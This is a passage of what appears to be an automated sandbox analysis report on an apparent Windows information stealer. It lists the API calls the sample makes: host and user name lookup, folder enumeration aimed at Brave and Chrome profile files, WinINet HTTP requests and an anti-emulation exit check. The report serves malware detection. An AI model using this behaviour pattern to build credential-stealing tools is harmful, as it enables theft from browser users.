                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,024D9A00), ref: 00406303
                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,024DDF00,00000000,00000000,00400100,00000000), ref: 00406385
                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                        • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                        • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                        • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                        • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocComputerNameProcess
                        • String ID:
                        • API String ID: 4203777966-0
                        • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                        • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                        • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                        • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                        • ExitProcess.KERNEL32 ref: 00401143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                        • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                        • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                        • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 024B021E
                        • Module32First.KERNEL32(00000000,00000224), ref: 024B023E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024AE000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_24ae000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: afd4401f752226bdade55d4ac59fc8be439db8945360a94d92761af533a7f90c
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: F1F0C2329003146FD7213AF9988CBBF76ECAF49226F10112AE646951C0DB70EC098A61
                        APIs
                        • SetErrorMode.KERNEL32(00000400,?,?,040A0223,?,?), ref: 040A0E19
                        • SetErrorMode.KERNEL32(00000000,?,?,040A0223,?,?), ref: 040A0E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: aa8218d920a278acd49a8db63b1ae2b83c19079fa7ae511ab9695a0ffe455710
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: E5D0123114512C77DB402ED4DC09BCD7B5CDF09B62F008011FB0DE9080C770954046E5
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                        • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                        • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                        • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                        APIs
                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                        • ExitProcess.KERNEL32 ref: 004011C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocName$ComputerExitUser
                        • String ID:
                        • API String ID: 1004333139-0
                        • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                        • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                        • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                        • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 024AFF06
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 024AE000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_24ae000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: be2364e89d7b933b9c224b0629d1f80ff19385dbc47c31aa267f80f9c11f186c
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: F7113979A00208EFDB01DF98C985E99BBF5AF08351F0580A5F9489B361D371EA90EF90
                        APIs
                        • wsprintfA.USER32 ref: 004138CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-817767981
                        • Opcode ID: 6cb684ace6967589941c3eb8540661810fdcea85d8e50341589a8dc562ba4125
                        • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                        • Opcode Fuzzy Hash: 6cb684ace6967589941c3eb8540661810fdcea85d8e50341589a8dc562ba4125
                        • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 9738bf910ff1965ffb943994e09d242b4311d669ed09d9d9b2d3beb31a06f825
                        • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                        • Opcode Fuzzy Hash: 9738bf910ff1965ffb943994e09d242b4311d669ed09d9d9b2d3beb31a06f825
                        • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                        APIs
                        • wsprintfA.USER32 ref: 0041492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                        • FindClose.KERNEL32(000000FF), ref: 00414B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 637e1f55b370a77931354714e54409c2954acea7e3f6c3a29657c541e3a86ea0
                        • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                        • Opcode Fuzzy Hash: 637e1f55b370a77931354714e54409c2954acea7e3f6c3a29657c541e3a86ea0
                        • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                        APIs
                        • wsprintfA.USER32 ref: 040B3B33
                        • FindFirstFileA.KERNEL32(?,?), ref: 040B3B4A
                        • lstrcat.KERNEL32(?,?), ref: 040B3B9C
                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 040B3BAE
                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 040B3BC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040B3ECE
                        • FindClose.KERNEL32(000000FF), ref: 040B3EE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID:
                        • API String ID: 1125553467-0
                        • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                        • Instruction ID: 03ec0b458e740f53f6e48d96f1a458cbe4565dab6a388247d5a5c23dbe61f5ce
                        • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                        • Instruction Fuzzy Hash: 79A194B5A40218ABDB30DFA4CC84FEE73B9FF45304F044589A64DA6180DB74AB84CF96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                        • HeapAlloc.KERNEL32(00000000), ref: 00414587
                        • wsprintfA.USER32 ref: 004145A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                        • FindClose.KERNEL32(000000FF), ref: 004146A0
                        • lstrcatA.KERNEL32(?,024D99F0,?,00000104), ref: 004146C5
                        • lstrcatA.KERNEL32(?,024DD680), ref: 004146D8
                        • lstrlenA.KERNEL32(?), ref: 004146E5
                        • lstrlenA.KERNEL32(?), ref: 004146F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 13328894-2848263008
                        • Opcode ID: 49f7cd920285fb998418c40c2082670281bcd5633157a42a48444e56202711e4
                        • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                        • Opcode Fuzzy Hash: 49f7cd920285fb998418c40c2082670281bcd5633157a42a48444e56202711e4
                        • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                        APIs
                        • wsprintfA.USER32 ref: 040B4B93
                        • FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                        • FindClose.KERNEL32(000000FF), ref: 040B4DF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID:
                        • API String ID: 180737720-0
                        • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                        • Instruction ID: f12e136bc689036e0f5c53e0dfe77d545a3703e0b34f4244123f3420261d4619
                        • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                        • Instruction Fuzzy Hash: 2461A6B5A40218BBDB20EBE0DD44FEE73BDFB49304F00458CA649A6141EB75A745CF95
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 040AC15C
                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 040AC1B4
                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 040AC1CA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040ACA26
                        • FindClose.KERNEL32(000000FF), ref: 040ACA38
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                        • Instruction ID: 7ad36ffe0440553eb9d930556d1cbabf0a4023d7b1b22cdeb37f604ce8702d49
                        • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                        • Instruction Fuzzy Hash: 05424172A10104ABEB14FBB4DD95EEE7379AF9430CF404158A54AB6190EF34BB48CFA5
                        APIs
                        • wsprintfA.USER32 ref: 00413EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                        • FindClose.KERNEL32(000000FF), ref: 00414081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: e1a96a9cc30f0257c9d9d85f794f09743e15ad4d0fc8c7b306005909d784861f
                        • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                        • Opcode Fuzzy Hash: e1a96a9cc30f0257c9d9d85f794f09743e15ad4d0fc8c7b306005909d784861f
                        • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 040B47E7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B47EE
                        • wsprintfA.USER32 ref: 040B480D
                        • FindFirstFileA.KERNEL32(?,?), ref: 040B4824
                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 040B4852
                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 040B4868
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040B48F2
                        • FindClose.KERNEL32(000000FF), ref: 040B4907
                        • lstrcat.KERNEL32(?,0064A524), ref: 040B492C
                        • lstrcat.KERNEL32(?,0064A22C), ref: 040B493F
                        • lstrlen.KERNEL32(?), ref: 040B494C
                        • lstrlen.KERNEL32(?), ref: 040B495D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID:
                        • API String ID: 671575355-0
                        • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                        • Instruction ID: 43f7ce0e70792d7d9b2caf22e0bd8c47f0d2153dcf223ac1c2453e52c8d1ed41
                        • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                        • Instruction Fuzzy Hash: 685199B5580218ABD724EFB0DC88FED737DEB54304F404588E649A6190DB74AB85CF95
                        APIs
                        • wsprintfA.USER32 ref: 040B412A
                        • FindFirstFileA.KERNEL32(?,?), ref: 040B4141
                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 040B416F
                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 040B4185
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 040B42D3
                        • FindClose.KERNEL32(000000FF), ref: 040B42E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID:
                        • API String ID: 180737720-0
                        • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                        • Instruction ID: 757a2d089d848b95b7054c35b1a725c68dc78e95bd4b134a2fd5ff09c35a16de
                        • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
